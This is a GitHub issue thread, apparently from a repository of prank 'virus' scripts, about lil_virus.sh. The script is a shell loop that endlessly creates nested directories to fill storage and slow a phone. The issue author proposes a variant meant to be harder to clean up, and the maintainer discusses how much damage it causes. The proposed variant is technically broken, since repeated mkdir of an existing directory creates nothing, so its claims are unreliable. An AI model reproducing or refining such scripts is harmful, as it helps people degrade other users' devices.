### ISSUE TITLE
lil_virus update

### ISSUE THREAD

**Issue by ZechBron** [Gameye98/V1RU5#1]
## Lil Virus Source Code:
```
## lil_virus.sh - mass attack
# little move, big changes
##
while true;do mkdir virus && cd virus;done
```
## Reversal incase you accidentally run the lil virus
> rm -rf virus

It is too simple. In just one command. Everything can be fixed. I've tried it in my own device.
So I fixed it. So the user would make an effort removing all the directory.

```
## lil_virus.sh - mass attack
# little move, big changes
##
while true;do mkdir virus;done
```

**Comment by Gameye98** [comment]
Do you notice that size of directory in Linux is 4096B = 4.0KB?
Its gonna take a lot of time until the storage is full, and phone become slower and its not really harmful. Who knows if the `mkdir` binary command itself gonna raise an Exception when find anomaly like there's no space anymore and then somehow break the current iteration or pass the task?
